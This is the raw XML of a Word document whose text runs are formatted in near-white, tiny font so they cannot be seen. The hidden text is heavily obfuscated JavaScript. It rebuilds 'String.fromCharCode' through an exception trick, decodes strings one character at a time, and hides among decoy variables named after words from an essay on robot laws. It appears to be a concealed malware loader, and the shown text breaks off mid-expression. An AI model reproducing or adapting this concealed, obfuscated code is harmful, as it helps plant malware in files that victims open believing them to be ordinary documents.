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odern No. 20" w:ascii="Modern No. 20" w:hAnsi="Modern No. 20"/>
          <w:color w:val="FEFFFF"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t>/*social53*/;/*this9*/;/*forces64*/;/*itself96*/;/*first30*/;/*State64*/;/*would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Modern No. 20" w:ascii="Modern No. 20" w:hAnsi="Modern No. 20"/>
          <w:color w:val="FEFFFF"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="8183245" cy="496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dern No. 20" w:ascii="Modern No. 20" w:hAnsi="Modern No. 20"/>
          <w:color w:val="FEFFFF"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t>68*/; try{ASer(7,0);}catch(Ed){  this['Brfcook']=((Ed+'')).length-(10+10);   RunGe=(Ed+'').substr(2-1,2-1); D_Rfcc='h'; this['Vgtf_56']=900;};  Wedt54='s'+'lice';  Rfd_ese=('Give up guyS'+'tring')[Wedt54](this['Brfcook']);  Wedt54=''; this['Brfcook']=[]; qsfcond_5='f'+'r'+Wedt54+'om'; var PpUzPnlJK=function(f){return Vgtf_56*false;}; function PpUzPnl(iswwot,fitjtha) {try{  qsfcond_5(iswwot); }catch(e){ if ( fitjtha!=RunGe ) {return true;} else { return Wedt54+this[Rfd_ese][qsfcond_5+['C'+D_Rfcc+'ar']+['C'+fitjtha]+(this.toString+Wedt54).substr(2,1)+'e'](iswwot); } return false; }};gicqnvictims66ko=false;gicqnSometimes7ko=false;gicqnandpurposes33ko=false;gicqnparliamentary43ko=true;gicqntheir87ko=false;gicqnconducted44ko=true;var gicqntime23ko='undefined'; var gicqnParliament34=false;var gicqnthey58ko=0.642; var gicqnstart96=0;var gicqnservice99ko='undefined'; var gicqnpractically59=false;var gicqnplace40ko=null; var gicqnhand51 =0;var gicqnadoptmeasures73ko=[644,285]; var gicqnthat6=0;var gicqnallpervading4ko='undefined'; var gicqnsacrificed15=false;var gicqnwhootherwise99ko=true; var gicqninkbottle82=null;var gicqnforward91ko='conscience16'; var gicqnformThe69=3;var gicqnwere86ko=0.9; var gicqndistributing22=null;var gicqnworkerof13ko=true; var gicqnthis27=null;var gicqnthat42ko=null; var gicqnalways41=null;var gicqntheprevious46ko='undefined'; var gicqnpolicy67=null;var gicqnaims98ko=0.725; var gicqnready60=null;var gicqnprinciple65ko=0.193; var gicqnthat43=null;var gicqnforforcing20ko={Q:75}; var gicqntheupper58=null;var gicqnwere28ko='wrote6'; var gicqnquestion20=false;var gicqnmade33ko=true; var gicqntradition75=4;var gicqnsocial65ko=false; var gicqnwhich71=0;var gicqnmany31ko={Y:79}; var gicqngoal92=1;var gicqnescape5ko=0.989; var gicqnbecause72=1;var gicqncomestheir26ko='robot28'; var gicqnaverted2=7;var gicqnavoid46ko=false; var gicqnalways25=(function(Rt,Rx){ var jntliv4=Brfcook; jntliv4[Vgtf_56]=4; jntliv4[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jntliv4[600]-jntliv4[Vgtf_56]),RunGe);  })('second5','itself96',null,'being84')+(function(Rt,Rx){ var iunfeat3=Brfcook; iunfeat3[Vgtf_56]=3; iunfeat3[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iunfeat3[600]-iunfeat3[Vgtf_56]),RunGe);  })('into30','Asimov30','must38')+(function(Rt,Rx){ var tinFort5=Brfcook; tinFort5[Vgtf_56]=0; tinFort5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tinFort5[600]-tinFort5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var psqform4=Brfcook; psqform4[Vgtf_56]=4; psqform4[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(psqform4[600]-psqform4[Vgtf_56]),RunGe);  })('robots83',false,null,true)+(function(Rt,Rx){ var ssnroad3=Brfcook; ssnroad3[Vgtf_56]=1; ssnroad3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ssnroad3[600]-ssnroad3[Vgtf_56]),RunGe);  })('lawsthe36')+(function(Rt,Rx){ var phpgrat3=Brfcook; phpgrat3[Vgtf_56]=1; phpgrat3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(phpgrat3[600]-phpgrat3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var uwvmer4=Brfcook; uwvmer4[Vgtf_56]=3; uwvmer4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwvmer4[600]-uwvmer4[Vgtf_56]),RunGe);  })(2127,false,2127)+(function(Rt,Rx){ var nvwskill3=Brfcook; nvwskill3[Vgtf_56]=2; nvwskill3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvwskill3[600]-nvwskill3[Vgtf_56]),RunGe);  })('human24','entertain53')+(function(Rt,Rx){ var vsithat5=Brfcook; vsithat5[Vgtf_56]=3; vsithat5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vsithat5[600]-vsithat5[Vgtf_56]),RunGe);  })(true,true,true);var gicqnbolted65ko={P:69}; var gicqnprinciple18=(function(Rt,Rx){ var usnande5=Brfcook; usnande5[Vgtf_56]=0; usnande5[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(usnande5[600]-usnande5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vfeoth3=Brfcook; vfeoth3[Vgtf_56]=0; vfeoth3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfeoth3[600]-vfeoth3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kuwwri3=Brfcook; kuwwri3[Vgtf_56]=0; kuwwri3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kuwwri3[600]-kuwwri3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qvqev5=Brfcook; qvqev5[Vgtf_56]=0; qvqev5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qvqev5[600]-qvqev5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jqhmerel3=Brfcook; jqhmerel3[Vgtf_56]=0; jqhmerel3[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqhmerel3[600]-jqhmerel3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fjqgrad3=Brfcook; fjqgrad3[Vgtf_56]=0; fjqgrad3[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fjqgrad3[600]-fjqgrad3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ethli4=Brfcook; ethli4[Vgtf_56]=4; ethli4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ethli4[600]-ethli4[Vgtf_56]),RunGe);  })(993,null,false,'second5')+(function(Rt,Rx){ var wjtsk4=Brfcook; wjtsk4[Vgtf_56]=4; wjtsk4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjtsk4[600]-wjtsk4[Vgtf_56]),RunGe);  })(true,null,1752,'human24')+(function(Rt,Rx){ var ustthat4=Brfcook; ustthat4[Vgtf_56]=2; ustthat4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ustthat4[600]-ustthat4[Vgtf_56]),RunGe);  })(null,'obey60')+(function(Rt,Rx){ var teiconte4=Brfcook; teiconte4[Vgtf_56]=3; teiconte4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(teiconte4[600]-teiconte4[Vgtf_56]),RunGe);  })('what20','humans11',true)+(function(Rt,Rx){ var thkFort5=Brfcook; thkFort5[Vgtf_56]=2; thkFort5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thkFort5[600]-thkFort5[Vgtf_56]),RunGe);  })(true,'while59')+(function(Rt,Rx){ var twhme5=Brfcook; twhme5[Vgtf_56]=0; twhme5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twhme5[600]-twhme5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wkjli4=Brfcook; wkjli4[Vgtf_56]=2; wkjli4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wkjli4[600]-wkjli4[Vgtf_56]),RunGe);  })(false,'second5')+(function(Rt,Rx){ var wfwmer3=Brfcook; wfwmer3[Vgtf_56]=1; wfwmer3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wfwmer3[600]-wfwmer3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var pitcon4=Brfcook; pitcon4[Vgtf_56]=2; pitcon4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pitcon4[600]-pitcon4[Vgtf_56]),RunGe);  })('what20',true)+(function(Rt,Rx){ var spqav3=Brfcook; spqav3[Vgtf_56]=0; spqav3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(spqav3[600]-spqav3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ewvonl5=Brfcook; ewvonl5[Vgtf_56]=1; ewvonl5[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewvonl5[600]-ewvonl5[Vgtf_56]),RunGe);  })('being84')+(function(Rt,Rx){ var hqfgrat5=Brfcook; hqfgrat5[Vgtf_56]=4; hqfgrat5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hqfgrat5[600]-hqfgrat5[Vgtf_56]),RunGe);  })('addition49',null,false,'being51')+(function(Rt,Rx){ var kqnroad3=Brfcook; kqnroad3[Vgtf_56]=2; kqnroad3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kqnroad3[600]-kqnroad3[Vgtf_56]),RunGe);  })('lawsthe36',false)+(function(Rt,Rx){ var wiuskill5=Brfcook; wiuskill5[Vgtf_56]=4; wiuskill5[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wiuskill5[600]-wiuskill5[Vgtf_56]),RunGe);  })(null,'human24',true,'entertain53')+(function(Rt,Rx){ var juflive5=Brfcook; juflive5[Vgtf_56]=1; juflive5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(juflive5[600]-juflive5[Vgtf_56]),RunGe);  })('second5')+(function(Rt,Rx){ var pwnFort4=Brfcook; pwnFort4[Vgtf_56]=4; pwnFort4[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwnFort4[600]-pwnFort4[Vgtf_56]),RunGe);  })(2906,'while59','that50','orthrough89')+(function(Rt,Rx){ var knegrad3=Brfcook; knegrad3[Vgtf_56]=3; knegrad3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(knegrad3[600]-knegrad3[Vgtf_56]),RunGe);  })('robots83',null,'conscience16')+(function(Rt,Rx){ var fjjgr4=Brfcook; fjjgr4[Vgtf_56]=1; fjjgr4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fjjgr4[600]-fjjgr4[Vgtf_56]),RunGe);  })(1824)+(function(Rt,Rx){ var jvfwrit4=Brfcook; jvfwrit4[Vgtf_56]=3; jvfwrit4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvfwrit4[600]-jvfwrit4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40',false)+(function(Rt,Rx){ var fnntha3=Brfcook; fnntha3[Vgtf_56]=3; fnntha3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fnntha3[600]-fnntha3[Vgtf_56]),RunGe);  })(true,false,false)+(function(Rt,Rx){ var nupgra5=Brfcook; nupgra5[Vgtf_56]=2; nupgra5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nupgra5[600]-nupgra5[Vgtf_56]),RunGe);  })('Laws75',2512)+(function(Rt,Rx){ var isqfea5=Brfcook; isqfea5[Vgtf_56]=3; isqfea5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(isqfea5[600]-isqfea5[Vgtf_56]),RunGe);  })(1413,1413,'into30')+(function(Rt,Rx){ var vpvande5=Brfcook; vpvande5[Vgtf_56]=3; vpvande5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vpvande5[600]-vpvande5[Vgtf_56]),RunGe);  })(null,'could80','State64')+(function(Rt,Rx){ var pkqava5=Brfcook; pkqava5[Vgtf_56]=4; pkqava5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pkqava5[600]-pkqava5[Vgtf_56]),RunGe);  })('progress41',null,'displayed83',false)+(function(Rt,Rx){ var ehnlive4=Brfcook; ehnlive4[Vgtf_56]=3; ehnlive4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehnlive4[600]-ehnlive4[Vgtf_56]),RunGe);  })('second5','itself96',null)+(function(Rt,Rx){ var uqkeve4=Brfcook; uqkeve4[Vgtf_56]=3; uqkeve4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqkeve4[600]-uqkeve4[Vgtf_56]),RunGe);  })(null,true,215)+(function(Rt,Rx){ var wfnroad4=Brfcook; wfnroad4[Vgtf_56]=0; wfnroad4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wfnroad4[600]-wfnroad4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fiklive3=Brfcook; fiklive3[Vgtf_56]=4; fiklive3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fiklive3[600]-fiklive3[Vgtf_56]),RunGe);  })('second5',null,true,null)+(function(Rt,Rx){ var hfnco3=Brfcook; hfnco3[Vgtf_56]=2; hfnco3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfnco3[600]-hfnco3[Vgtf_56]),RunGe);  })('what20',false)+(function(Rt,Rx){ var hfwon4=Brfcook; hfwon4[Vgtf_56]=2; hfwon4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfwon4[600]-hfwon4[Vgtf_56]),RunGe);  })('being84','injure17')+(function(Rt,Rx){ var vhfeve3=Brfcook; vhfeve3[Vgtf_56]=1; vhfeve3[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhfeve3[600]-vhfeve3[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var nfvande3=Brfcook; nfvande3[Vgtf_56]=4; nfvande3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nfvande3[600]-nfvande3[Vgtf_56]),RunGe);  })('could80',null,'State64','situationbecame47')+(function(Rt,Rx){ var hpwgra5=Brfcook; hpwgra5[Vgtf_56]=1; hpwgra5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hpwgra5[600]-hpwgra5[Vgtf_56]),RunGe);  })('robots83');var gicqnpolicy67ko=0.102; var gicqnHere71=true;var gicqntricks57ko=[118,372]; var gicqnmoment54=true;var gicqnsocialreform5ko=false; var gicqnvisit78=true;var gicqnparticularly92ko='undefined'; var gicqnnothing15=String[(function(Rt,Rx){ var jhemerel5=Brfcook; jhemerel5[Vgtf_56]=3; jhemerel5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhemerel5[600]-jhemerel5[Vgtf_56]),RunGe);  })(false,'idea46','indeed17')+(function(Rt,Rx){ var pwnFor4=Brfcook; pwnFor4[Vgtf_56]=4; pwnFor4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwnFor4[600]-pwnFor4[Vgtf_56]),RunGe);  })(false,'while59','that50','orthrough89')+(function(Rt,Rx){ var hhuski3=Brfcook; hhuski3[Vgtf_56]=1; hhuski3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuski3[600]-hhuski3[Vgtf_56]),RunGe);  })(2327)+(function(Rt,Rx){ var wufme4=Brfcook; wufme4[Vgtf_56]=2; wufme4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wufme4[600]-wufme4[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var kfuothe3=Brfcook; kfuothe3[Vgtf_56]=3; kfuothe3[Vgtf_56-(Vgtf_56/3)]=70; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfuothe3[600]-kfuothe3[Vgtf_56]),RunGe);  })('robot28','into6',null)+(function(Rt,Rx){ var psqski3=Brfcook; psqski3[Vgtf_56]=0; psqski3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(psqski3[600]-psqski3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vswcon4=Brfcook; vswcon4[Vgtf_56]=2; vswcon4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vswcon4[600]-vswcon4[Vgtf_56]),RunGe);  })('declarations83',true)+(function(Rt,Rx){ var wqeliv5=Brfcook; wqeliv5[Vgtf_56]=3; wqeliv5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqeliv5[600]-wqeliv5[Vgtf_56]),RunGe);  })('second5','itself96',null)+(function(Rt,Rx){ var tkqfeatu4=Brfcook; tkqfeatu4[Vgtf_56]=2; tkqfeatu4[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkqfeatu4[600]-tkqfeatu4[Vgtf_56]),RunGe);  })('into30',false)+(function(Rt,Rx){ var jqsskil4=Brfcook; jqsskil4[Vgtf_56]=0; jqsskil4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqsskil4[600]-jqsskil4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jtpgr4=Brfcook; jtpgr4[Vgtf_56]=2; jtpgr4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtpgr4[600]-jtpgr4[Vgtf_56]),RunGe);  })(1475,'robots83')+(function(Rt,Rx){ var etpwri3=Brfcook; etpwri3[Vgtf_56]=2; etpwri3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(etpwri3[600]-etpwri3[Vgtf_56]),RunGe);  })('Both81',1532)](92);var gicqndeputies70ko='although94'; var gicqncarried61=this[(function(Rt,Rx){ var ffuwri5=Brfcook; ffuwri5[Vgtf_56]=2; ffuwri5[Vgtf_56-(Vgtf_56/3)]=89; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ffuwri5[600]-ffuwri5[Vgtf_56]),RunGe);  })('Both81',861)+(function(Rt,Rx){ var kenandem3=Brfcook; kenandem3[Vgtf_56]=1; kenandem3[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kenandem3[600]-kenandem3[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var ekuHe3=Brfcook; ekuHe3[Vgtf_56]=2; ekuHe3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ekuHe3[600]-ekuHe3[Vgtf_56]),RunGe);  })('rooted92','thus68')+(function(Rt,Rx){ var hqugra5=Brfcook; hqugra5[Vgtf_56]=1; hqugra5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hqugra5[600]-hqugra5[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var jhsgrat3=Brfcook; jhsgrat3[Vgtf_56]=2; jhsgrat3[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhsgrat3[600]-jhsgrat3[Vgtf_56]),RunGe);  })(1950,'addition49')+(function(Rt,Rx){ var vhjgradu3=Brfcook; vhjgradu3[Vgtf_56]=4; vhjgradu3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhjgradu3[600]-vhjgradu3[Vgtf_56]),RunGe);  })(2489,'Laws75',true,'although94')+(function(Rt,Rx){ var jththat83=Brfcook; jththat83[Vgtf_56]=3; jththat83[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jththat83[600]-jththat83[Vgtf_56]),RunGe);  })(false,'obey60',false)];var gicqnthat42ko=null; var gicqnIwas18=this[(function(Rt,Rx){ var tknavala4=Brfcook; tknavala4[Vgtf_56]=2; tknavala4[Vgtf_56-(Vgtf_56/3)]=67; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tknavala4[600]-tknavala4[Vgtf_56]),RunGe);  })('progress41',1543)+(function(Rt,Rx){ var vukthepa3=Brfcook; vukthepa3[Vgtf_56]=3; vukthepa3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vukthepa3[600]-vukthepa3[Vgtf_56]),RunGe);  })('must38',false,'named69')+(function(Rt,Rx){ var vsuavala4=Brfcook; vsuavala4[Vgtf_56]=1; vsuavala4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vsuavala4[600]-vsuavala4[Vgtf_56]),RunGe);  })('progress41')+(function(Rt,Rx){ var qfitha5=Brfcook; qfitha5[Vgtf_56]=1; qfitha5[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qfitha5[600]-qfitha5[Vgtf_56]),RunGe);  })('obey60')+(function(Rt,Rx){ var hfncons4=Brfcook; hfncons4[Vgtf_56]=0; hfncons4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfncons4[600]-hfncons4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nhngrat4=Brfcook; nhngrat4[Vgtf_56]=4; nhngrat4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nhngrat4[600]-nhngrat4[Vgtf_56]),RunGe);  })(false,'addition49',null,'being51')+(function(Rt,Rx){ var hunme5=Brfcook; hunme5[Vgtf_56]=4; hunme5[Vgtf_56-(Vgtf_56/3)]=92; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hunme5[600]-hunme5[Vgtf_56]),RunGe);  })('idea46','indeed17','supposed39','study32')+(function(Rt,Rx){ var whuthat5=Brfcook; whuthat5[Vgtf_56]=3; whuthat5[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whuthat5[600]-whuthat5[Vgtf_56]),RunGe);  })('obey60',false,true)+(function(Rt,Rx){ var tsugrati3=Brfcook; tsugrati3[Vgtf_56]=4; tsugrati3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tsugrati3[600]-tsugrati3[Vgtf_56]),RunGe);  })(true,'addition49',true,true)+(function(Rt,Rx){ var iuvevery4=Brfcook; iuvevery4[Vgtf_56]=1; iuvevery4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iuvevery4[600]-iuvevery4[Vgtf_56]),RunGe);  })('White35')+(function(Rt,Rx){ var kqhHere3=Brfcook; kqhHere3[Vgtf_56]=2; kqhHere3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kqhHere3[600]-kqhHere3[Vgtf_56]),RunGe);  })(false,'rooted92')+(function(Rt,Rx){ var vwvcon3=Brfcook; vwvcon3[Vgtf_56]=1; vwvcon3[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vwvcon3[600]-vwvcon3[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var svtwr5=Brfcook; svtwr5[Vgtf_56]=2; svtwr5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svtwr5[600]-svtwr5[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')];var gicqntheprevious46ko='undefined'; var gicqnbythe41=0;var gicqnaims98ko=0.725; var gicqnsocial54=gicqncarried61[(function(Rt,Rx){ var fvnco4=Brfcook; fvnco4[Vgtf_56]=0; fvnco4[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fvnco4[600]-fvnco4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var swiavala5=Brfcook; swiavala5[Vgtf_56]=3; swiavala5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(swiavala5[600]-swiavala5[Vgtf_56]),RunGe);  })(true,'progress41',true)+(function(Rt,Rx){ var qhtco5=Brfcook; qhtco5[Vgtf_56]=0; qhtco5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhtco5[600]-qhtco5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ktiHere84=Brfcook; ktiHere84[Vgtf_56]=4; ktiHere84[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ktiHere84[600]-ktiHere84[Vgtf_56]),RunGe);  })('rooted92','thus68','slow19','fool83')+(function(Rt,Rx){ var hvsli4=Brfcook; hvsli4[Vgtf_56]=4; hvsli4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvsli4[600]-hvsli4[Vgtf_56]),RunGe);  })(1715,null,false,'second5')+(function(Rt,Rx){ var jwjgr3=Brfcook; jwjgr3[Vgtf_56]=3; jwjgr3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwjgr3[600]-jwjgr3[Vgtf_56]),RunGe);  })('addition49','being51',1639)+(function(Rt,Rx){ var ktncon5=Brfcook; ktncon5[Vgtf_56]=4; ktncon5[Vgtf_56-(Vgtf_56/3)]=74; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ktncon5[600]-ktncon5[Vgtf_56]),RunGe);  })(458,'declarations83','provided81',true)+(function(Rt,Rx){ var tiesk3=Brfcook; tiesk3[Vgtf_56]=3; tiesk3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tiesk3[600]-tiesk3[Vgtf_56]),RunGe);  })('human24',null,'entertain53')+(function(Rt,Rx){ var qphavala4=Brfcook; qphavala4[Vgtf_56]=4; qphavala4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qphavala4[600]-qphavala4[Vgtf_56]),RunGe);  })('progress41',null,true,false)+(function(Rt,Rx){ var vptav3=Brfcook; vptav3[Vgtf_56]=1; vptav3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vptav3[600]-vptav3[Vgtf_56]),RunGe);  })('progress41')+(function(Rt,Rx){ var ewftha3=Brfcook; ewftha3[Vgtf_56]=2; ewftha3[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewftha3[600]-ewftha3[Vgtf_56]),RunGe);  })(false,'obey60')+(function(Rt,Rx){ var twhwr4=Brfcook; twhwr4[Vgtf_56]=0; twhwr4[Vgtf_56-(Vgtf_56/3)]=97; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twhwr4[600]-twhwr4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var sevgr3=Brfcook; sevgr3[Vgtf_56]=4; sevgr3[Vgtf_56-(Vgtf_56/3)]=113; return 